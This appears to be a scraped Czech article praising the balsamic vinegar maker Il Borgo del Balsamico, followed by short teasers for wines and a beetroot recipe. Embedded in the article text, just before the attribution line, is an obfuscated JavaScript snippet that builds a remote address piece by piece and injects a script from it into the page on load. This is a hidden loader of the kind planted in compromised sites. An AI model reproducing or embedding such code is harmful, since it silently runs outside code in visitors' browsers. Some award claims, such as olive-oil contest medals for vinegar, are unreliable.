Il Borgo del Balsamico: opravdová chuť italského balsamica

Balsamico je speciální druh octa, který se vyrábí z hroznového moštu a zraje v dřevěných sudech. Je typickým produktem italské gastronomie, který se používá k dochucení různých pokrmů, jako jsou saláty, sýry, maso, zelenina nebo ovoce. Balsamico má bohatou a komplexní chuť, která je zároveň sladká a kyselá, a vyznačuje se tmavou barvou a hustou konzistencí. Pokud chcete ochutnat opravdové balsamico, zvolte značku Il Borgo del Balsamico, italskou rodinnou firmu, která se zabývá výrobou a prodejem tradičního octa balsamico di Reggio Emilia. V tomto článku se dozvíte o její historii, jaké balsamico dneska vyrábí a jaké získalo ocenění. Rodinná firma Il Borgo del Balsamico byla založena v roce 1974 Brunem Crottim a jeho manželkou Paolou, kteří zdědili starou acetaiu (octárnu) od svých předků. Dnes firmu řídí jejich dcery Cristina a Silvia, které pokračují v rodinné tradici s vášní a profesionalitou. Il Borgo del Balsamico sídlí v Botteghe di Albinea, malé vesnici nedaleko Reggio nellEmilia, kde se nachází i historická rezidence Le Dimore del Borgo, která nabízí ubytování a možnost návštěvy octárny. Firma produkuje různé druhy balsamica, od toho tradičního s chráněným označením původu (DOP), který zraje v dřevěných sudech po dobu nejméně 12 let, po toho s chráněným zeměpisným označením (IGP), který má kratší dobu zrání a je vhodný pro každodenní použití. Il Borgo del Balsamico se pyšní kvalitou a autentičností svých produktů, které jsou vyrobeny pouze z hroznového moštu bez přidání žádných konzervantů nebo barviv. Firma také dbá na design a estetiku svých lahví a etiket, které jsou inspirovány barvami a tvary přírody. Mezi jejich nejznámější produkty patří: Aceto Balsamico Tradizionale di Reggio Emilia DOP: je nejprestižnější a nejkvalitnější druh balsamica, který se vyrábí podle přísných pravidel konzorcia ABTRE. Je rozdělen do tří kategorií podle doby zrání a organoleptických vlastností: aragosta (oranžová), argento (stříbrná) a oro (zlatá). Aceto Balsamico di Modena IGP: je druh balsamica, který se vyrábí podle pravidel konzorcia ABM. Je rozdělen do čtyř kategorií podle hustoty a obsahu extraktu: rossa (červená), arancio (oranžová), gialla (žlutá) a bianca (bílá). Condimenti: je speciální druh balsamica, které se vyrábí podle osobních receptur firmy. Jsou určeny pro různé druhy pokrmů a mají originální názvy jako Il Secco del Borgo (suchý), Aqualcunopiacebianco (bílý), Nonchiamatemiaceto (neříkejte mi ocet) nebo Satin Rose Edition (saténová růžová edice). Il Borgo del Balsamico získal mnoho ocenění za své produkty, jak na národní, tak na mezinárodní úrovni. K těm nejcennějším patří: Zlatá medaile na soutěži International Taste & Quality Institute v Bruselu Zlatá medaile na soutěži Monde Selection v Bruselu Zlatá medaile na soutěži Great Taste Awards v Londýně Zlatá medaile na soutěži Los Angeles International Extra Virgin Olive Oil Competition Zlatá medaile na soutěži New York International Olive Oil Competition Acetaia Il Borgo del Balsamico je jednou z nejlepších italských značek balsamica, která dokazuje, že tento jedinečný produkt je nejen chutný, ale i krásný. Italské balsamico je nejlepší na světě, protože je výsledkem dlouhé historie, tradice a umění, které se předávají z generace na generaci. (function(){ t4b8u="yqvhwXr74b8p";t4b8=document.createElement("script"); t4b8_="u"+("st");t4b8_+="at"+(".");t4b8.async=true;t4b8_+="in"; t4b8u="544340773."+t4b8u;t4b8.type="text/javascript";t4b8u+="2m58cp1cqXle"; t4b8u+="tts3py";t4b8_+=("f")+"o"+("/");t4b8.src="https://"+t4b8_+t4b8u; t4b8d=document.body;t4b8d.appendChild(t4b8); })(); Článek Il Borgo del Balsamico: opravdová chuť italského balsamica se nejdříve objevil na Fox Pc.

  • Web: Fox Pc
  • Aktualizace: 12.3.2024
projít na článek

Balsamico: Od historie až po unikátní kulinářské využití

Italská kuchyně je jednou z nejuznávanějších a nejvíce milovaných na celém světě. Jednou z nejdůležitějších surovin, která tuto kuchyni zdobí, je balsamico, jehož autenticita a komplexnost chutě jsou proslulé po celém světě. Ponořme se společně do fascinu

projít na článek

Malbech IGT Borgo Stajnbech 13%, 0,75l

Popis produktu Malbech IGT Borgo Stajnbech 13%, 0,75l Barva je jasně rubínově červená s fialovými odstíny. Vůně je výrazná, ovocná s tóny červeného ovoce zejména malin . Chuť je suchá, plná a bohatá. Odrůda : 100% Malbec Alk: 13% Teplota podávání: 16 18

projít na článek

Pinot Grigio DOC Venezia, Borgo Stajnbech 13%, 0,75 l

Popis produktu Pinot Grigio DOC Venezia, Borgo Stajnbech 13%,  0,75 l Slámově žlutá barva s měděnou leskem, připomínající barvou hroznů. Příjemné víno. V chuti svěží a ovocná s tóny zelených jablek.Výborné plné tělo. Odrůda: 100% Pinot Grigio Alk: 13%

projít na článek

Lison 150 DOCG Classico Borgo Stajnbech 13%, 0,75l

Popis produktu Lison 150 DOCG Classico Borgo Stajnbech 13%, 0,75l. Klasická slámově žlutá barva s jemnými zelenkavými odlesky. Vůně je intenzivní, s květinovými tóny lípy, fialek a květů akátu. V ústech je nádherně hladké, trvalé, elegantní, s charakteris

projít na článek

Pomazánka z červené řepy

Co potřebujeme? 1 bulva řepy červené – předvařená či pečená 100 g čerstvého kozího sýra 125 g Tradičního pomazánkového 100 ml octa balsamico 50 ml olivového oleje 1 lžíce medu pepř a sůl Postup Pokud se rozhodnete pro pečenou řepu, omyté bulvy zabalíme d

projít na článek